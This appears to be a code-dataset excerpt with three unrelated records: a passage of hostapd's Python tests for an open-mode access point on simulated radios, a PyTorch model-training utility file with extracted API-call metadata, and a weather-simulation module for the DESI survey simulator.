dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10) if ev is None: raise Exception("Timeout on MGMT-TX-STATUS") if "result=SUCCESS" not in ev: raise Exception("AP did not ack Action frame") def test_ap_open_invalid_wmm_action(dev, apdev): """AP with open mode configuration and invalid WMM Action frame""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") bssid = apdev[0]['bssid'] cmd = "MGMT_TX {} {} freq=2412 action=1100".format(bssid, bssid) if "FAIL" in dev[0].request(cmd): raise Exception("Could not send test Action frame") ev = dev[0].wait_event(["MGMT-TX-STATUS"], timeout=10) if ev is None or "result=SUCCESS" not in ev: raise Exception("AP did not ack Action frame") def test_ap_open_reconnect_on_inactivity_disconnect(dev, apdev): """Reconnect to open mode AP after inactivity related disconnection""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") hapd.request("DEAUTHENTICATE " + dev[0].p2p_interface_addr() + " reason=4") dev[0].wait_disconnected(timeout=5) dev[0].wait_connected(timeout=2, error="Timeout on reconnection") def test_ap_open_assoc_timeout(dev, apdev): """AP timing out association""" ssid = "test" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].scan(freq="2412") hapd.set("ext_mgmt_frame_handling", "1") dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", wait_connect=False) for i in range(0, 10): req = hapd.mgmt_rx() if req is None: raise Exception("MGMT RX wait timed out") if req['subtype'] == 11: break req = None if not req: raise Exception("Authentication frame not received") resp = {} resp['fc'] = req['fc'] resp['da'] = req['sa'] resp['sa'] = req['da'] resp['bssid'] = req['bssid'] resp['payload'] = struct.pack('<HHH', 0, 2, 0) hapd.mgmt_tx(resp) assoc = 0 for i in range(0, 10): req = hapd.mgmt_rx() if req is None: raise Exception("MGMT RX wait timed out") if req['subtype'] == 0: assoc += 1 if assoc == 3: break if assoc != 3: raise Exception("Association Request frames not received: assoc=%d" % assoc) hapd.set("ext_mgmt_frame_handling", "0") dev[0].wait_connected(timeout=15) def test_ap_open_id_str(dev, apdev): """AP with open mode and id_str""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", id_str="foo", wait_connect=False) ev = dev[0].wait_connected(timeout=10) if "id_str=foo" not in ev: raise Exception("CTRL-EVENT-CONNECT did not have matching id_str: " + ev) if dev[0].get_status_field("id_str") != "foo": raise Exception("id_str mismatch") def test_ap_open_select_any(dev, apdev): """AP with open mode and select any network""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) id = dev[0].connect("unknown", key_mgmt="NONE", scan_freq="2412", only_add_network=True) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", only_add_network=True) dev[0].select_network(id) ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND", "CTRL-EVENT-CONNECTED"], timeout=10) if ev is None: raise Exception("No result reported") if "CTRL-EVENT-CONNECTED" in ev: raise Exception("Unexpected connection") dev[0].select_network("any") dev[0].wait_connected(timeout=10) def test_ap_open_unexpected_assoc_event(dev, apdev): """AP with open mode and unexpected association event""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") dev[0].request("DISCONNECT") dev[0].wait_disconnected(timeout=15) dev[0].dump_monitor() # This will be accepted due to matching network subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412", apdev[0]['bssid']]) dev[0].wait_connected(timeout=15) dev[0].dump_monitor() dev[0].request("REMOVE_NETWORK all") dev[0].wait_disconnected(timeout=5) dev[0].dump_monitor() # This will result in disconnection due to no matching network subprocess.call(['iw', 'dev', dev[0].ifname, 'connect', 'open', "2412", apdev[0]['bssid']]) dev[0].wait_disconnected(timeout=15) def test_ap_bss_load(dev, apdev): """AP with open mode (no security) configuration""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open", "bss_load_update_period": "10" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") # this does not really get much useful output with mac80211_hwsim currently, # but run through the channel survey update couple of times for i in range(0, 10): hwsim_utils.test_connectivity(dev[0], hapd) hwsim_utils.test_connectivity(dev[0], hapd) hwsim_utils.test_connectivity(dev[0], hapd) time.sleep(0.15) def hapd_out_of_mem(hapd, apdev, count, func): with alloc_fail(hapd, count, func): started = False try: hostapd.add_ap(apdev['ifname'], { "ssid": "open" }) started = True except: pass if started: raise Exception("hostapd interface started even with memory allocation failure: " + arg) def test_ap_open_out_of_memory(dev, apdev): """hostapd failing to setup interface due to allocation failure""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_alloc_bss_data") for i in range(1, 3): hapd_out_of_mem(hapd, apdev[1], i, "hostapd_iface_alloc") for i in range(1, 5): hapd_out_of_mem(hapd, apdev[1], i, "hostapd_config_defaults;hostapd_config_alloc") hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_config_alloc") hapd_out_of_mem(hapd, apdev[1], 1, "hostapd_driver_init") for i in range(1, 4): hapd_out_of_mem(hapd, apdev[1], i, "=wpa_driver_nl80211_drv_init") # eloop_register_read_sock() call from i802_init() hapd_out_of_mem(hapd, apdev[1], 1, "eloop_sock_table_add_sock;eloop_register_sock;?eloop_register_read_sock;=i802_init") # verify that a new interface can still be added when memory allocation does # not fail hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" }) def test_bssid_black_white_list(dev, apdev): """BSSID black/white list""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist=apdev[1]['bssid']) dev[1].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_blacklist=apdev[1]['bssid']) dev[2].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist="00:00:00:00:00:00/00:00:00:00:00:00", bssid_blacklist=apdev[1]['bssid']) if dev[0].get_status_field('bssid') != apdev[1]['bssid']: raise Exception("dev[0] connected to unexpected AP") if dev[1].get_status_field('bssid') != apdev[0]['bssid']: raise Exception("dev[1] connected to unexpected AP") if dev[2].get_status_field('bssid') != apdev[0]['bssid']: raise Exception("dev[2] connected to unexpected AP") dev[0].request("REMOVE_NETWORK all") dev[1].request("REMOVE_NETWORK all") dev[2].request("REMOVE_NETWORK all") dev[2].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist="00:00:00:00:00:00", wait_connect=False) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_whitelist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff") dev[1].connect("open", key_mgmt="NONE", scan_freq="2412", bssid_blacklist="11:22:33:44:55:66/ff:00:00:00:00:00 " + apdev[1]['bssid'] + " aa:bb:cc:dd:ee:ff") if dev[0].get_status_field('bssid') != apdev[1]['bssid']: raise Exception("dev[0] connected to unexpected AP") if dev[1].get_status_field('bssid') != apdev[0]['bssid']: raise Exception("dev[1] connected to unexpected AP") dev[0].request("REMOVE_NETWORK all") dev[1].request("REMOVE_NETWORK all") ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1) if ev is not None: raise Exception("Unexpected dev[2] connectin") dev[2].request("REMOVE_NETWORK all") def test_ap_open_wpas_in_bridge(dev, apdev): """Open mode AP and wpas interface in a bridge""" br_ifname='sta-br0' ifname='wlan5' try: _test_ap_open_wpas_in_bridge(dev, apdev) finally: subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'down']) subprocess.call(['brctl', 'delif', br_ifname, ifname]) subprocess.call(['brctl', 'delbr', br_ifname]) subprocess.call(['iw', ifname, 'set', '4addr', 'off']) def _test_ap_open_wpas_in_bridge(dev, apdev): hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) br_ifname='sta-br0' ifname='wlan5' wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5') # First, try a failure case of adding an interface try: wpas.interface_add(ifname, br_ifname=br_ifname) raise Exception("Interface addition succeeded unexpectedly") except Exception, e: if "Failed to add" in str(e): logger.info("Ignore expected interface_add failure due to missing bridge interface: " + str(e)) else: raise # Next, add the bridge interface and add the interface again subprocess.call(['brctl', 'addbr', br_ifname]) subprocess.call(['brctl', 'setfd', br_ifname, '0']) subprocess.call(['ip', 'link', 'set', 'dev', br_ifname, 'up']) subprocess.call(['iw', ifname, 'set', '4addr', 'on']) subprocess.check_call(['brctl', 'addif', br_ifname, ifname]) wpas.interface_add(ifname, br_ifname=br_ifname) wpas.connect("open", key_mgmt="NONE", scan_freq="2412") def test_ap_open_start_disabled(dev, apdev): """AP with open mode and beaconing disabled""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open", "start_disabled": "1" }) bssid = apdev[0]['bssid'] dev[0].flush_scan_cache() dev[0].scan(freq=2412, only_new=True) if dev[0].get_bss(bssid) is not None: raise Exception("AP was seen beaconing") if "OK" not in hapd.request("RELOAD"): raise Exception("RELOAD failed") dev[0].scan_for_bss(bssid, freq=2412) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") def test_ap_open_start_disabled2(dev, apdev): """AP with open mode and beaconing disabled (2)""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open", "start_disabled": "1" }) bssid = apdev[0]['bssid'] dev[0].flush_scan_cache() dev[0].scan(freq=2412, only_new=True) if dev[0].get_bss(bssid) is not None: raise Exception("AP was seen beaconing") if "OK" not in hapd.request("UPDATE_BEACON"): raise Exception("UPDATE_BEACON failed") dev[0].scan_for_bss(bssid, freq=2412) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") if "OK" not in hapd.request("UPDATE_BEACON"): raise Exception("UPDATE_BEACON failed") dev[0].request("DISCONNECT") dev[0].wait_disconnected() dev[0].request("RECONNECT") dev[0].wait_connected() def test_ap_open_ifdown(dev, apdev): """AP with open mode and external ifconfig down""" params = { "ssid": "open", "ap_max_inactivity": "1" } hapd = hostapd.add_ap(apdev[0]['ifname'], params) bssid = apdev[0]['bssid'] dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") dev[1].connect("open", key_mgmt="NONE", scan_freq="2412") subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'down']) ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=10) if ev is None: raise Exception("Timeout on AP-STA-DISCONNECTED (1)") ev = hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=5) if ev is None: raise Exception("Timeout on AP-STA-DISCONNECTED (2)") ev = hapd.wait_event(["INTERFACE-DISABLED"], timeout=5) if ev is None: raise Exception("No INTERFACE-DISABLED event") # The following wait tests beacon loss detection in mac80211 on dev0. # dev1 is used to test stopping of AP side functionality on client polling. dev[1].request("REMOVE_NETWORK all") subprocess.call(['ip', 'link', 'set', 'dev', apdev[0]['ifname'], 'up']) dev[0].wait_disconnected() dev[1].wait_disconnected() ev = hapd.wait_event(["INTERFACE-ENABLED"], timeout=10) if ev is None: raise Exception("No INTERFACE-ENABLED event") dev[0].wait_connected() hwsim_utils.test_connectivity(dev[0], hapd) def test_ap_open_disconnect_in_ps(dev, apdev, params): """Disconnect with the client in PS to regression-test a kernel bug""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bg_scan_period="0") ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5) if ev is None: raise Exception("No connection event received from hostapd") time.sleep(0.2) hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_MANUAL_POLL) try: # inject some traffic sa = hapd.own_addr() da = dev[0].own_addr() hapd.request('DATA_TEST_CONFIG 1') hapd.request('DATA_TEST_TX {} {} 0'.format(da, sa)) hapd.request('DATA_TEST_CONFIG 0') # let the AP send couple of Beacon frames time.sleep(0.3) # disconnect - with traffic pending - shouldn't cause kernel warnings dev[0].request("DISCONNECT") finally: hwsim_utils.set_powersave(dev[0], hwsim_utils.PS_DISABLED) time.sleep(0.2) out = run_tshark(os.path.join(params['logdir'], "hwsim0.pcapng"), "wlan_mgt.tim.partial_virtual_bitmap", ["wlan_mgt.tim.partial_virtual_bitmap"]) if out is not None: state = 0 for l in out.splitlines(): pvb = int(l, 16) if pvb > 0 and state == 0: state = 1 elif pvb == 0 and state == 1: state = 2 if state != 2: raise Exception("Didn't observe TIM bit getting set and unset (state=%d)" % state) def test_ap_open_select_network(dev, apdev): """Open mode connection and SELECT_NETWORK to change network""" hapd1 = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) bssid1 = apdev[0]['bssid'] hapd2 = hostapd.add_ap(apdev[1]['ifname'], { "ssid": "open2" }) bssid2 = apdev[1]['bssid'] id1 = dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", only_add_network=True) id2 = dev[0].connect("open2", key_mgmt="NONE", scan_freq="2412") hwsim_utils.test_connectivity(dev[0], hapd2) dev[0].select_network(id1) dev[0].wait_connected() res = dev[0].request("BLACKLIST") if bssid1 in res or bssid2 in res: raise Exception("Unexpected blacklist entry") hwsim_utils.test_connectivity(dev[0], hapd1) dev[0].select_network(id2) dev[0].wait_connected() hwsim_utils.test_connectivity(dev[0], hapd2) res = dev[0].request("BLACKLIST") if bssid1 in res or bssid2 in res: raise Exception("Unexpected blacklist entry(2)") def test_ap_open_disable_enable(dev, apdev): """AP with open mode getting disabled and re-enabled""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bg_scan_period="0") for i in range(2): hapd.request("DISABLE") dev[0].wait_disconnected() hapd.request("ENABLE") dev[0].wait_connected() hwsim_utils.test_connectivity(dev[0], hapd) def sta_enable_disable(dev, bssid): dev.scan_for_bss(bssid, freq=2412) work_id = dev.request("RADIO_WORK add block-work") ev = dev.wait_event(["EXT-RADIO-WORK-START"]) if ev is None: raise Exception("Timeout while waiting radio work to start") id = dev.connect("open", key_mgmt="NONE", scan_freq="2412", only_add_network=True) dev.request("ENABLE_NETWORK %d" % id) if "connect@" not in dev.request("RADIO_WORK show"): raise Exception("connect radio work missing") dev.request("DISABLE_NETWORK %d" % id) dev.request("RADIO_WORK done " + work_id) ok = False for i in range(30): if "connect@" not in dev.request("RADIO_WORK show"): ok = True break time.sleep(0.1) if not ok: raise Exception("connect radio work not completed") ev = dev.wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1) if ev is not None: raise Exception("Unexpected connection") dev.request("DISCONNECT") def test_ap_open_sta_enable_disable(dev, apdev): """AP with open mode and wpa_supplicant ENABLE/DISABLE_NETWORK""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) bssid = apdev[0]['bssid'] sta_enable_disable(dev[0], bssid) wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5') wpas.interface_add("wlan5", drv_params="force_connect_cmd=1") sta_enable_disable(wpas, bssid)
[]
andreakropp/datarobot-user-models
task_templates/pipelines/python3_pytorch_regression/model_utils.py
423ab8c703a545491ad6013a0b7efa3119e2c0fc
#!/usr/bin/env python # coding: utf-8 # pylint: disable-all from __future__ import absolute_import from sklearn.preprocessing import LabelEncoder from pathlib import Path import torch from torch.autograd import Variable import torch.nn as nn import torch.optim as optim class BinModel(nn.Module): expected_target_type = torch.FloatTensor def __init__(self, input_size): super(BinModel, self).__init__() self.fc1 = nn.Linear(input_size, 50) self.relu1 = nn.ReLU() self.dout = nn.Dropout(0.2) self.fc2 = nn.Linear(50, 100) self.prelu = nn.PReLU(1) self.out = nn.Linear(100, 1) self.out_act = nn.Sigmoid() def forward(self, input_): a1 = self.fc1(input_) h1 = self.relu1(a1) dout = self.dout(h1) a2 = self.fc2(dout) h2 = self.prelu(a2) a3 = self.out(h2) y = self.out_act(a3) return y class RegModel(nn.Module): def __init__(self, input_size): super(RegModel, self).__init__() self.fc1 = nn.Linear(input_size, 50) self.relu1 = nn.ReLU() self.dout = nn.Dropout(0.2) self.fc2 = nn.Linear(50, 100) self.prelu = nn.PReLU(1) self.out = nn.Linear(100, 1) def forward(self, input_): a1 = self.fc1(input_) h1 = self.relu1(a1) dout = self.dout(h1) a2 = self.fc2(dout) h2 = self.prelu(a2) y = self.out(h2) return y class MultiModel(nn.Module): expected_target_type = torch.LongTensor def __init__(self, input_size, output_size): super(MultiModel, self).__init__() self.layer1 = nn.Linear(input_size, 8) self.relu = nn.ReLU() self.layer2 = nn.Linear(8, output_size) self.out = nn.Softmax() def forward(self, input_): out = self.layer1(input_) out = self.relu(out) out = self.layer2(out) out = self.out(out) return out def train_epoch(model, opt, criterion, X, y, batch_size=50): model.train() losses = [] for beg_i in range(0, X.size(0), batch_size): x_batch = X[beg_i : beg_i + batch_size, :] # y_hat will be (batch_size, 1) dim, so coerce target to look the same y_batch = y[beg_i : beg_i + batch_size].reshape(-1, 1) x_batch = Variable(x_batch) y_batch = Variable(y_batch) opt.zero_grad() # (1) Forward y_hat = model(x_batch) # (2) Compute diff loss = criterion(y_hat, y_batch) # (3) Compute gradients loss.backward() # (4) update weights opt.step() losses.append(loss.data.numpy()) return losses def build_classifier(X, num_labels): class_model = BinModel(X.shape[1]) if num_labels == 2 else MultiModel(X.shape[1], num_labels) class_opt = optim.Adam(class_model.parameters(), lr=0.001) class_criterion = nn.BCELoss() if num_labels == 2 else nn.CrossEntropyLoss() return class_model, class_opt, class_criterion def build_regressor(X): reg_model = RegModel(X.shape[1]) reg_opt = optim.Adam(reg_model.parameters(), lr=0.001) reg_criterion = nn.MSELoss() return reg_model, reg_opt, reg_criterion def train_classifier(X, y, class_model, class_opt, class_criterion, n_epochs=5): target_encoder = LabelEncoder() target_encoder.fit(y) transformed_y = target_encoder.transform(y) bin_t_X = torch.from_numpy(X.values).type(torch.FloatTensor) bin_t_y = torch.from_numpy(transformed_y).type(class_model.expected_target_type) for e in range(n_epochs): train_epoch(class_model, class_opt, class_criterion, bin_t_X, bin_t_y) def train_regressor(X, y, reg_model, reg_opt, reg_criterion, n_epochs=5): reg_t_X = torch.from_numpy(X.values).type(torch.FloatTensor) reg_t_y = torch.from_numpy(y.values).type(torch.FloatTensor) for e in range(n_epochs): train_epoch(reg_model, reg_opt, reg_criterion, reg_t_X, reg_t_y) def save_torch_model(model, output_dir_path, filename="torch_bin.pth"): output_file_path = Path(output_dir_path) / filename torch.save(model, output_file_path) def subset_data(X): numerics = ["int16", "int32", "int64", "float16", "float32", "float64"] # exclude any completely-missing columns when checking for numerics num_features = list(X.dropna(axis=1, how="all").select_dtypes(include=numerics).columns) # keep numeric features, zero-impute any missing values # obviously this is a very rudimentary approach to handling missing values # a more sophisticated imputer can be implemented by making use of custom transform, load, and predict hooks return X[num_features].fillna(0)
[((3164, 3176), 'torch.nn.MSELoss', 'nn.MSELoss', ([], {}), '()\n', (3174, 3176), True, 'import torch.nn as nn\n'), ((3327, 3341), 'sklearn.preprocessing.LabelEncoder', 'LabelEncoder', ([], {}), '()\n', (3339, 3341), False, 'from sklearn.preprocessing import LabelEncoder\n'), ((4120, 4155), 'torch.save', 'torch.save', (['model', 'output_file_path'], {}), '(model, output_file_path)\n', (4130, 4155), False, 'import torch\n'), ((443, 468), 'torch.nn.Linear', 'nn.Linear', (['input_size', '(50)'], {}), '(input_size, 50)\n', (452, 468), True, 'import torch.nn as nn\n'), ((490, 499), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (497, 499), True, 'import torch.nn as nn\n'), ((520, 535), 'torch.nn.Dropout', 'nn.Dropout', (['(0.2)'], {}), '(0.2)\n', (530, 535), True, 'import torch.nn as nn\n'), ((555, 573), 'torch.nn.Linear', 'nn.Linear', (['(50)', '(100)'], {}), '(50, 100)\n', (564, 573), True, 'import torch.nn as nn\n'), ((595, 606), 'torch.nn.PReLU', 'nn.PReLU', (['(1)'], {}), '(1)\n', (603, 606), True, 'import torch.nn as nn\n'), ((626, 643), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (635, 643), True, 'import torch.nn as nn\n'), ((667, 679), 'torch.nn.Sigmoid', 'nn.Sigmoid', ([], {}), '()\n', (677, 679), True, 'import torch.nn as nn\n'), ((1052, 1077), 'torch.nn.Linear', 'nn.Linear', (['input_size', '(50)'], {}), '(input_size, 50)\n', (1061, 1077), True, 'import torch.nn as nn\n'), ((1099, 1108), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (1106, 1108), True, 'import torch.nn as nn\n'), ((1129, 1144), 'torch.nn.Dropout', 'nn.Dropout', (['(0.2)'], {}), '(0.2)\n', (1139, 1144), True, 'import torch.nn as nn\n'), ((1164, 1182), 'torch.nn.Linear', 'nn.Linear', (['(50)', '(100)'], {}), '(50, 100)\n', (1173, 1182), True, 'import torch.nn as nn\n'), ((1204, 1215), 'torch.nn.PReLU', 'nn.PReLU', (['(1)'], {}), '(1)\n', (1212, 1215), True, 'import torch.nn as nn\n'), ((1235, 1252), 'torch.nn.Linear', 'nn.Linear', (['(100)', '(1)'], {}), '(100, 1)\n', (1244, 1252), True, 'import torch.nn as nn\n'), ((1660, 1684), 'torch.nn.Linear', 'nn.Linear', (['input_size', '(8)'], {}), '(input_size, 8)\n', (1669, 1684), True, 'import torch.nn as nn\n'), ((1705, 1714), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (1712, 1714), True, 'import torch.nn as nn\n'), ((1737, 1762), 'torch.nn.Linear', 'nn.Linear', (['(8)', 'output_size'], {}), '(8, output_size)\n', (1746, 1762), True, 'import torch.nn as nn\n'), ((1782, 1794), 'torch.nn.Softmax', 'nn.Softmax', ([], {}), '()\n', (1792, 1794), True, 'import torch.nn as nn\n'), ((2326, 2343), 'torch.autograd.Variable', 'Variable', (['x_batch'], {}), '(x_batch)\n', (2334, 2343), False, 'from torch.autograd import Variable\n'), ((2362, 2379), 'torch.autograd.Variable', 'Variable', (['y_batch'], {}), '(y_batch)\n', (2370, 2379), False, 'from torch.autograd import Variable\n'), ((2911, 2923), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (2921, 2923), True, 'import torch.nn as nn\n'), ((2948, 2969), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (2967, 2969), True, 'import torch.nn as nn\n'), ((4083, 4104), 'pathlib.Path', 'Path', (['output_dir_path'], {}), '(output_dir_path)\n', (4087, 4104), False, 'from pathlib import Path\n'), ((3430, 3456), 'torch.from_numpy', 'torch.from_numpy', (['X.values'], {}), '(X.values)\n', (3446, 3456), False, 'import torch\n'), ((3495, 3526), 'torch.from_numpy', 'torch.from_numpy', (['transformed_y'], {}), '(transformed_y)\n', (3511, 3526), False, 'import torch\n'), ((3766, 3792), 'torch.from_numpy', 'torch.from_numpy', (['X.values'], {}), '(X.values)\n', (3782, 3792), False, 'import torch\n'), ((3831, 3857), 'torch.from_numpy', 'torch.from_numpy', (['y.values'], {}), '(y.values)\n', (3847, 3857), False, 'import torch\n')]
mlandriau/surveysim
py/surveysim/weather.py
e7a323d6c4031b1b8df25e776dbe81188fbe8860
"""Simulate stochastic observing weather conditions. The simulated conditions include seeing, transparency and the dome-open fraction. """ from __future__ import print_function, division, absolute_import from datetime import datetime import numpy as np import astropy.time import astropy.table import astropy.units as u import desiutil.log import desimodel.weather import desisurvey.config import desisurvey.ephem import desisurvey.utils class Weather(object): """Simulate weather conditions affecting observations. The start/stop date range is taken from the survey config. Seeing and transparency values are stored with 32-bit floats to save some memory. Parameters ---------- seed : int Random number seed to use to generate stochastic conditions. The seed determines the same seeing and transparency realization independent of the value of ``replay``. replay : str Either 'random' or a comma-separated list of years whose historical weather should be replayed, e.g. 'Y2010,Y2012'. Replayed weather will be used cyclically if necessary. Random weather will be a boostrap sampling of all available years with historical weather data. Use 'Y2015' for the worst-case weather scenario. time_step : float or :class:`astropy.units.Quantity`, optional Time step calculating updates. Must evenly divide 24 hours. If unitless float, will be interpreted as minutes. restore : filename or None Restore an existing weather simulation from the specified file name. All other parameters are ignored when this is provided. A relative path name refers to the :meth:`configuration output path <desisurvey.config.Configuration.get_path>`. extra_downtime : float Additionally close the dome completely on some nights. Nights are chosen randomly, with the chance of the night being closed equal to extra_random_close_fraction. This is intended to include margin. """ def __init__(self, seed=1, replay='random', time_step=5, restore=None, extra_downtime=0): if not isinstance(time_step, u.Quantity): time_step = time_step * u.min self.log = desiutil.log.get_logger() config = desisurvey.config.Configuration() ephem = desisurvey.ephem.get_ephem() if restore is not None: fullname = config.get_path(restore) self._table = astropy.table.Table.read(fullname) self.start_date = desisurvey.utils.get_date( self._table.meta['START']) self.stop_date = desisurvey.utils.get_date( self._table.meta['STOP']) self.num_nights = self._table.meta['NIGHTS'] self.steps_per_day = self._table.meta['STEPS'] self.replay = self._table.meta['REPLAY'] self.log.info('Restored weather from {}.'.format(fullname)) return else: self.log.info('Generating random weather with seed={} replay="{}".' .format(seed, replay)) gen = np.random.RandomState(seed) # Use our config to set any unspecified dates. start_date = config.first_day() stop_date = config.last_day() num_nights = (stop_date - start_date).days if num_nights <= 0: raise ValueError('Expected start_date < stop_date.') # Check that the time step evenly divides 24 hours. steps_per_day = int(round((1 * u.day / time_step).to(1).value)) if not np.allclose((steps_per_day * time_step).to(u.day).value, 1.): raise ValueError( 'Requested time_step does not evenly divide 24 hours: {0}.' .format(time_step)) # Calculate the number of times where we will tabulate the weather. num_rows = num_nights * steps_per_day meta = dict(START=str(start_date), STOP=str(stop_date), NIGHTS=num_nights, STEPS=steps_per_day, REPLAY=replay) self._table = astropy.table.Table(meta=meta) # Initialize column of MJD timestamps. t0 = desisurvey.utils.local_noon_on_date(start_date) times = t0 + (np.arange(num_rows) / float(steps_per_day)) * u.day self._table['mjd'] = times.mjd # Generate a random atmospheric seeing time series. dt_sec = 24 * 3600. / steps_per_day self._table['seeing'] = desimodel.weather.sample_seeing( num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32) # Generate a random atmospheric transparency time series. self._table['transparency'] = desimodel.weather.sample_transp( num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32) if replay == 'random': # Generate a bootstrap sampling of the historical weather years. years_to_simulate = config.last_day().year - config.first_day().year + 1 history = ['Y{}'.format(year) for year in range(2007, 2018)] replay = ','.join(gen.choice(history, years_to_simulate, replace=True)) # Lookup the dome closed fractions for each night of the survey. # This step is deterministic and only depends on the config weather # parameter, which specifies which year(s) of historical daily # weather to replay during the simulation. dome_closed_frac = desimodel.weather.dome_closed_fractions( start_date, stop_date, replay=replay) r = gen.uniform(size=num_nights) r2 = gen.uniform(size=num_nights) dome_closed_frac[r2 < extra_downtime] = 1. # Convert fractions of scheduled time to hours per night. ilo, ihi = (start_date - ephem.start_date).days, (stop_date - ephem.start_date).days bright_dusk = ephem._table['brightdusk'].data[ilo:ihi] bright_dawn = ephem._table['brightdawn'].data[ilo:ihi] dome_closed_time = dome_closed_frac * (bright_dawn - bright_dusk) # Randomly pick between three scenarios for partially closed nights: # 1. closed from dusk, then open the rest of the night. # 2. open at dusk, then closed for the rest of the night. # 3. open and dusk and dawn, with a closed period during the night. # Pick scenarios 1+2 with probability equal to the closed fraction. # Use a fixed number of random numbers to decouple from the seeing # and transparency sampling below. self._table['open'] = np.ones(num_rows, bool) for i in range(num_nights): sl = slice(i * steps_per_day, (i + 1) * steps_per_day) night_mjd = self._table['mjd'][sl] # Dome is always closed before dusk and after dawn. closed = (night_mjd < bright_dusk[i]) | (night_mjd >= bright_dawn[i]) if dome_closed_frac[i] == 0: # Dome open all night. pass elif dome_closed_frac[i] == 1: # Dome closed all night. This occurs with probability frac / 2. closed[:] = True elif r[i] < 0.5 * dome_closed_frac[i]: # Dome closed during first part of the night. # This occurs with probability frac / 2. closed |= (night_mjd < bright_dusk[i] + dome_closed_time[i]) elif r[i] < dome_closed_frac[i]: # Dome closed during last part of the night. # This occurs with probability frac / 2. closed |= (night_mjd > bright_dawn[i] - dome_closed_time[i]) else: # Dome closed during the middle of the night. # This occurs with probability 1 - frac. Use the value of r[i] # as the fractional time during the night when the dome reopens. dome_open_at = bright_dusk[i] + r[i] * (bright_dawn[i] - bright_dusk[i]) dome_closed_at = dome_open_at - dome_closed_time[i] closed |= (night_mjd >= dome_closed_at) & (night_mjd < dome_open_at) self._table['open'][sl][closed] = False self.start_date = start_date self.stop_date = stop_date self.num_nights = num_nights self.steps_per_day = steps_per_day self.replay = replay def save(self, filename, overwrite=True): """Save the generated weather to a file. The saved file can be restored using the constructor `restore` parameter. Parameters ---------- filename : str Name of the file where the weather should be saved. A relative path name refers to the :meth:`configuration output path <desisurvey.config.Configuration.get_path>`. overwrite : bool Silently overwrite any existing file when this is True. """ config = desisurvey.config.Configuration() filename = config.get_path(filename) self._table.write(filename, overwrite=overwrite) self.log.info('Saved weather to {0}.'.format(filename)) def get(self, time): """Get the weather conditions at the specified time(s). Returns the conditions at the closest tabulated time, rather than using interpolation. Parameters ---------- time : astropy.time.Time Time(s) when the simulated weather is requested. Returns ------- table slice Slice of precomputed table containing row(s) corresponding to the requested time(s). """ offset = np.floor( (time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5 ).astype(int) if np.any(offset < 0) or np.any(offset > len(self._table)): raise ValueError('Cannot get weather beyond tabulated range.') return self._table[offset]
